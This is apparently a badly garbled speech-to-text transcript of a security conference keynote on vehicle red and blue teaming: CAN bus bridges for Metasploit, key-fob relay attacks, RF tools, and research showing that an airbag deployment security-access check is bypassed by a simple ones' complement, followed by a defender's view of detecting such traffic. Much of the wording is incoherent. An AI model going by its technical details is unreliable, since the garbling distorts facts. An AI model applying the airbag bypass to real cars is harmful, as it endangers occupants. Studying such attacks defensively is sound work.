Morning Keynote

[Music]

some of it is you guys don't know crank is also I would consider would be a red teamer right as the lingo goes there's a lot of religious conflicts on the naming and the explanation of when England s here by trade I would put myself on the other side of the density everybody and some yes and put things on the wider here a little bit of this earlier but basically the whole deal for you is that oh it's for you to really get together with people and do work and learning some things and try out stuff and new breaks and things those new friendships and maybe hopefully take some things away from these sides that I never

inspires you or benefits the business that you work in to really facilitate so all that said it's just we're here to learn and we're gonna do something ever since we got yeah thanks guys not bad mrs. it's my first time I see sighs Casey facilities fantastic that amount of people who lose my life I think I heard briefly a couple weeks go by cutter can see over 750 people of sign up phenomenal absolutely very very very cool another breath began declaring is fantastic to clinical basins are acting very certainty here so my name's Rick Smith I am a research director of transportation security found something so what that basically means is if it's a plane train

automobile over time to quit a minute really any kind of ice that movement and electronics fault was my wheelhouse it research or deal with DC and policies and whatnot the whole gamut I also direct the car actress handbook and much mother focus or schools colossal them today and read like a piece of law called packet said we focus on network visibility and omniscient music along but a lot of that focus on the route response and investigation and helping establish eye consolidation efforts to really do instant responsible and so it's a lot of time doing a lot of response in a lot of places as I've never going to get anyway the folks are that all being about

openness or over the poverty line or doing the right things when something bad happens to you and so this talk we're going to talk about where maybe it's part of it but it's also more about these this realm and to be looting defending I see that we're very very good as a security community at type things and pretending things that are on the internet you know protocol very well as long as it's on the Internet's we never been understand for us today a lot of tools that what frameworks and just years of experience now however you tend to fall to work whenever it comes to things outside and everybody stop the connected thing so we've got our tools

are just about meets us how scope between this along to stop its we need to bridge that gap between some of the digital internet world as well we're just considering security and presidency you have your eight control older cars the stones new medical devices yet your alarm system so you know I'll have security of something them that are definitely true be considered his filthy effects corporate by our own environment safety and we need to be able to include those in the same amount as the same quality of tests on those kinds of devices physical devices that we would on the possessor of our website so however companies for most of our teens with from history on about

mechanical things like trying the street logic chips you know they basically actuated relays and things of that nature and as time progressed you got smaller and smaller the night before the community and so that minute one which you've heard more flexible but by doing that you basically have great firm line firmwares basically to software and we have software anything we have software but also going to have my taxes and vulnerabilities those things now they do the next internet that we're supposed is simple and we see those in our scanners if we're scanning and fire let's connect our network we'll see you though well the only piece of advice you know in fact Michael was RF signals

nature we can find some qualities that way and I can sir these willing and oftentimes these are things like maybe they're ICS distilment employments the network you fighting this sometimes or this some startup that's creating some product not fair about security or sometimes they're just trying to get something out there and get decent funding so after their Kickstarter have done they get their product you can exit out a company and most consumers a lot of devices are usually 5r7 we desire to grab things we put internet-enabled devices for ipv4 sort but what although is are not connected to the Internet right so when you're doing those we still need a method to kind of look at

those and you gotta learn of all abilities of decent nobody can go back to simply replay the key opening yeah there's a popular target there's are other ways to trigger this or a negative state have been that's the other part we see less stuff of my vehicle is where we're using relay attacks to steal cars this is the area right now that we're seeing kind of that acted maliciously of the cars missing people stealing and no sir vehicle horrible it's still a little difficult now for the attack expect from red teaming we do have certain things that usually stack up these schools not all of us don't be memory things or you know like proxmark are are out the arts to

tipless burger yeah and of course each one of these tools fragile the framework their own you know some specific operating system nor do we use them so while the absolutely news it's not really part of our normal daily skills or technical abilities it's not always the easiest thing to gather and use it each product is different so this is one of the dishes I felt the Metasploit Harbour Bridge and I chose these Metasploit because it's mainly a plan without most people these are some understand who's aware of its existence that's a big attack framework it is really internet decided that as our great soul of a distance we're second and so some people will be scared

community type Thunderbird so that will take us away like some of their game and that's the way although that's what does support bye-bye now Catholic last year that's the part where next allowed to bring any language and the recent beings is that one people toward this double partner to enable the prices so with everything lonely right there it's either similar or whatever the content teammate wanted at 58 the I necessarily for the arbitrator discipline and if defender doesn't want to support you that's also fun you can actually modify kind of wrap around that's when they work that's good anyway and we do this by talking on whatever the buzinova talk to the main inspector material people or

maybe here whatever put a piece of hardware box appeared computer on you talk to the same way and they translate the data into D so we used to buy these three lights so we have a really sorry going past week there's a lot of buildings the main monster space so when you're in the you can easily just you know technically how to the with the Harbour Bridge and this is a Linux socket can have a proof of concept servers a relay and it will use can utility bad installment but he could run the server if you talk to it in canvas people if you go to the National Forest exploit there is a tools partner for and that

there's another Ruby version this one's called Gila 327 battle 327 basically stomps these dominoes are like 10 the $20 the relatively cheap among the debaters we take your cell phones and you you know monitor gas monitor with this relay music were investable for suburb they don't need a very expensive pants knitting

[Music] in the same corner there's one Python or Killer Bee and that uses the Toby framework for safety you're going the ZigBee testing all the hardware that support advise killer key is we're not Metasploit they model only test for this board if you want to do RF signals because RF cat and RF pad that line doesn't necessarily the most which they work for say for that one you just get the latest school over RF at and it'll have a real a building so in the binary floor there's our relay matches course it's well over RF signals and then there's a new link I wear two weeks ago written in rust and gossip and like it

has a lot more security around it pretty cool framework not always kind of like it so this is my first major attempt at using Russ feel free to play me for it definitely could be broken down like rates and whatnot but too dysfunctional this were all I'm gonna know the thought of Linux socket can it's not the part pain details to be on it to just directly talk to Pam this is mainly written because I was I need a model for the people over black there is a prototype of teeth coming out she know him to be basically power so when I invite you to run on that evening so that's what that's for is an exercise

benefit that having any binary version of the relay this is not which was supported by rapid seven or - wait no this one senator my topic writing in here you could take this binary and you want to increase your kill chair so if you polish out on an opportunity like your family or you pop show on their Panasonic TVs looking something else you can then push the binary to that device this relay and then basically relates and rec means to heart so in the past the other ones who really say environmentally binary Vanessa to do that this isn't against the best workers walking away but if you are testing out a theory of you know did somebody do all

this kind of access maybe doing a demo all the time towards new vehicle assessments are in demo is to demonstrate us unlocking starting a car from Arkansas so that's a up there forty to get more analogous to deploy airbase so I'm going ten minutes in a second but we have as those research done by the year ago and this is out of German I have these two researchers and you're just grow some tasty blowing some air big research we have part together our medical piece for them and research and what they were looking is a solid 14 so peoples have a salary ga-eun ideas that mutated part ii don't care that car doesn't mean crossed we can pack it down

we have to detonate on airbags first and most pyrotechnics identity do this there's a tool for people again higher technical but it did any and as a standard for how it works and so they're kind of looking through this and we've got one of our airbag and cars and it's the first thing the way it works is it goes through queries all their bits how many herbs in your car and then you go as sorry as well i'm going to arm these slices so it asks for spree access the way works of the the air maker going to sleep in value you run your secret sauce out there won't be the response diving has that an attractive arms devices

the player so we start looking through this and they ask their seat value and a seat number and it's a one byte number oh that's a short T space like again this year to be too hard we're going to a research paper here good so they got that going and then it started to be a little bit harder and they realize that oh this is just a one's complement algorithm so you kind of see that annette inside that i think if you make it out this may seem you have here binary ones and zeros you just invert the ones with zeros that's your answer so you can actually do this in your pet and that's actually where we're going so

we're going to make the request you get there for a number a quick way it's just like what would you need to add that number to get for 255 path neighbors home city was do this in your head when I asked you a crazy so we want that over there the standard and on the standard is seen the standards of okay you're requesting security access token you know run your suit yourself with them like for example this one's complement equation like oh I see whatever they just kind of paste this so they're very curious to see that go home who else have done this so you want to got some other vendors turning up be all business

yeah cut and pasted this one's complement number [Music] so there's a CVD for this this is actually considered low-risk the recent last consider lower risks because these to a standard it's not supposed to go to a boy and go up by the cross-product maxtv now I see supposed to because no accessible security created and that's para 108 minutes eternity but it the thing that you're probably doesn't follow that standards and you go down the lines a prize you know but I was curious about it security go down if you authorize your bias and then you send a bunch of scoop packets saying like oh I'm not driving right now and then you say that well you know that

answer that one yet so they I wants to take a new research paper you take direct symmetric compass reminisce so that's what comes with this thing right here if you have a nice version that's what you have this model it does not detonate their back well actually wasn't my thing to stop that one it was the one that University you never did like a section so that's missing one missing line if you had a reverse engineer that line so I'm going through the demo in a stimulating environment when I've actually done it didn't hear back here because it might be strapless anyway so I have a couple things here simulation never currently running on I think about

Caracara bill probably the security but kind of characteristics whenever source pool it supports models and I had a couple marvelous pchew is the one that doesn't come standard my interval is just one we use for testing and at Metasploit that's my rap seven to ensure that

that's right all these schools are really available you know it's always in here so that as well so all of these things as well I took a rifle really really safe on arguing what intervals

[Music]

we're rich right you don't actually get the little nervous they're saying about the matrix and all actions on this harbor responses that my order did it so that's our warning for anything attack when every function physical harder to get that actually so you need to be set up there playing interpreter in terms of the same area of interpret material tightness

this is just like wadiya's command it just means that I read and I run after this with blood on that specifies I ran right through models or under

there's not a lot optimistic marijuana it's more information is where the research papers at all that good stuff because I said backed up I don't really see minors

this is a personal attack extreme you seal so if you run this this is less windows can come out when clearly everybody controller have some information about it and this is Pratt's etiquette set so we have here to begin with in number here's on your vehicle's man is the airbase of course then you pull out all of the different aromatics is my outfit is system offensive 11 our salaries are next you can usually pick with your bank you want to play where you can play them all parts of the same collective support their networks and their security has to see that it's in there that time certainly gets excessive this actually leaves the vehicle in the

state of ready to report you really want excitement brain we suggest turning off the car but yeah this is a good way just make sure that if your car has this decoration is one another now let's make you verify it and so with this we're going to use this as our example like some red team routine stuff so for blackness last night he's been seen in herself

it's pretty much a thank you just say I can yes all right right that very simple and not a lot to be by packets mostly these University here it does effect these are but if you were to take the standard sheet looking at it it would go to follows exactly these are the does anybody understand the carbs now to hear these thank you okay or they can't so that's good reason why this is important is partly because the environment we live in today is you know sort of end of the road on the I type of my car they saw that I expose episode where is a I took over everything it's a lot so forth work you know tend

to a twelve years away from being you know supported to a greater intelligence than us in the short time you know we have some liability and legal implications that prevent you know and what would work for taking over so that you all get rid of a suspension for us and that famous that's an end game I'm sorry I brought my children to this world the way to think about this is what we're talking about here on the bus it's not just on carps and so as Craig talked about and transportation and there's an awful lot of places where these types of signals are going to be interesting because it's new place person calculus information knocking

your best school it's a safety thing in every device there has a sensor on it that provides some interface do you know some accident whether it be running the ship aground or it's yes sir its power how much school would have left from the guy that's you know driving my truck from his house in Kansas City you know to Seattle but not actually in the tab and you know all of these things so it's a very real situation so it's cool to do something interesting like I'm gonna deploy some airbags in any car that I choose but it's also really relevant so public service announcement here I don't want to get into the red team or blue

team thing I think the way that we think about it is every time you do something from an attackers perspective you should do it from a defenders perspective it's the same thing use the same technology use the same tool set practice that's will set practice those other things that you've got oftentimes we'll find that increase both sides of the point you know it ends in reference to this imagine that you're a guy that's working against somebody that wrote you know an exploit for something they spent three months on your you haven't seen it before you don't know anything about that thing anyway so what do you do you know you're kind of in a tough situation the key thing here

is you may see behaviors and execution that happens that you know our whole path and the ways do you think about all things this particular type of friends is different than other types of things but I'm going to approach it in the same way and the first thing is I'm going to spend the time to look through and understand the tools and technologies that happens and function it out so if you have something to come into a compromise of sustenance and you know they've given you the 320 page report on it you know I just popped everything here and on your domain controllers and I'm super awesome in the audacity period math then you also know that the

challenges you didn't learn anything from that exercise great so you know one of the great examples is critical for these tools that allow you to execute to those things so when you finally get understanding let's take for the sake of argument that somebody's to play their bags in a truck that I'm monitoring because it's not on this system and I have to understand what happens here and whether or not that wasn't illicit or not you know then we get into a conversation about what we do about it so you know I don't know let's think about this stuff because I didn't write all the tools that I'm not a hacker right so for that moment I've

got to really start to understand what happened here and the first thing is you know in this particular cases as an example I want to see the attack that Frank ran so before we're playing the you know on the side that just weren't here on that one it's in working in concert so we could put some airbags would be cool what does that look like see if that looks like specifically I think if you drop I can determine in that process what made sense it's like with some detection czar preventive controls around it or even just understand what happened and so you know in doing that one of the things that is great about standards is mica need not understand

what this thing's like or what it is but when I look to take some things off the virtual interface and take what we saw and then mapped up based on what the standard tells me you can understand it what looks like what that's how we're supposed to do because that's what the standard says to them and so know everything Stoppard is the standard dictates right most of the time in this particular case you call something like in a pile of traffic that very clearly under standard it was happening because of my you know snippet of time there and I could go into a little bit of detail here at will but when you look at this

structure in each of these because this is in a very big you know bite size it is an apple a terribly difficult to reverse and so even a guy like me can do that so when we start to investigate specifically look before and look at the map and some of the tools that correctly mentioned I can tell you what is affecting a particular this isn't the right ones yeah and it's a zero one here basically says this the driver's side front airbag and here you know what's Illustrated is

so you know here is when I add this combination I could uh every time I see something positive I get an apt addition of a four hundred here for the second fight and so I can see that in this case right here I have some actual correct behavior happening where I'm deploying airbags know I don't know whether or not that's the deterred for a village it but again I'm just trying to decipher you know in the background what's happening here after somebody called me and said to destroy the trunk of mind knowing that the dollars in we're supposed to go so air guys were precluded okay I found the air exits Leicester and then here I

know exactly was called here so from a signal perspective I have the ability to basically do something to put it back into a system or and evaluate every single time I look at that traffic that network traffic off again successfully understanding when that when that's transpired so I can also tell you that if it doesn't have a great sequence in essence that's going to be something that I want to make sure I'm gonna do some diligence on right away so here tools of the empire so these are all tools that Craig used in conjunction can generate the candy tools this kind of industry standard I would say and I think you can do anything that you want

anything you do with Wireshark or you know to speed off or you know any other very commonplace tools which interfere with canons so you can also generate a large amount of traffic to validate and the certain thing can also craft packets by we have doing that using these same tools so that I can sniff those and I can hit past into into the specific bomb of the protocols below that I can also utilize the same thickness so if I want to get more than just sort of can't header information I'm going to look deeply into the underlying protocols that I can do that to my particular case you know think about this the exercise here isn't just it's cool again you know

we pop some airbags but you guys remember the scantron test from high school in college maybe younger for younger that's funny okay so you know how they agreed to us they put a cover sheet on top of all of the answers and then they check all the ones that are you know correct they don't check the incorrect ones next to it or things that are affected by it right and so when I take that off and you look at deal with the security all of my educators are all the other answers other than the language right and so what I want to understand is are there any permutations of what Francis demonstrated here that are potentially

effective so again in the case of like an autonomous truck I would like to know and even the automated systems are both subject to this type of behavior as well as something else like is the driver side airbag the most critical one there or is it the passenger side airbag in which one of those things are provided applications that how significantly for the ranging effects than just you know you know gonna have a really bad problem with my net to the next ten years maybe it does something on the safe side things so you take those things you put it into the software development site minutes right as as a routine guy it's great for you to do triage intense

response however if you're not feeding that back into the product itself or the vendor itself as a function of that that you're doing both yourself and the vendor is servicing you should compare that real data so I grabbed a particular set of packets here and I said okay well this this is interesting for me I want to manifest online this sensor technology that I have here to make sure that that doesn't happen I could to death then as part of that is make sure that I'm providing the coverage of that in my Tesla procedure again as a blue Timur it's not just whether or not you're looking at a triaging traffic in the sim that's the whole

lifecycle is attributed you know so far so cool but GPS is cool too from the a7 chip yes okay how many have phones okay so you know this is also interesting that's when they think about how do I understand what this looks like the GPS environment was never designed for what it's being used for today right military-grade GPS maybe suspects who won't get into that here but commercial GPS and things that people utilize here this one has some relevance around a locomotive but I mean and in other cases it's your phone is what you're using the drive cars it's the Waze app it's whatever and understanding what's happening is a function that is also super critical where it Cerner so it's

probably appropriate to put in some things around and even though I was I was sort of educated a little bit of this last night I think some other things around how hl7 operates against religion some answer it would be cool if you looked at equal seven all the network would you understand it okay cool so you would know how to prevent you anyway then that is these types of things we get this level of visibility and the types of tools you can utilize to do that we're red team and blue team you know become pretty cool consumed this is only relevant that's exploitable right really and so as a blue team erm I care about boys potentially going to

bring a sista down cause safety issues you know the risk of business and you know Corcoran with somebody like and this piece Craig has been you know really both enlightening about what the technology stability but also the tools to do it so the last piece of this I want the lead with list you know make sure consumers typically are where to as possible junkies right so I'm going to triage instance I'm going to make sense so whatever you know applause requirements of these other things but you know it's really important for them to do research as well and research is adjusting the detections research is always other components and it gives them both the lifeblood of making better security

decisions but also getting an opportunity working conjunction with industry-leading research that most manifest more support with the engine so something like a piece science is an example of where these things compared together as well I think that's it if you guys want to get a hold of either one of us please feel free to drop an ego it's absolutely misspelled and there's no problem so obviously you know hang out the rest of the day and you know get involved get involved in the industry get involved in today and if there's other things that you guys are interested in or research winning here about or whatever it is to be having anybody to talk about I grab

us to talk about

oh hey guys about the safety training the problem that I have we've done this test the event fashion fix so put the state back to not being anything let's see what you're closing your car or anything in general tend to get what's called a Christmas tree in fact the lights are blinking lower place and introduce you to it's all guys brightening it at a time it's relatively say probably won't break your are going this but you will have heard on the back they are pretty brutal

that's the way enforcement

all right so you're going to drive all the way here people automatically have very great to add authentication on them and if somebody to talk to

she gently definitely continue to check the number of devices interconnected we're not going by the way Indians need specifics you know where do I start that's all

yes [Music]

yeah yeah oh they're one that I work with was before the assimilation of Diagnostics where we were before he was that are responsible for that Superfund was actually attacked but that's not a sign of factors making our cocktail now it would do things like quite long Billy's in the car and that nature is just we might have won that little release with a political edge of time

anybody else questions awesome before you guys check out two important wipers one this room becomes a couple of minutes almost immediately three rooms so I guess it's closing time

[Applause]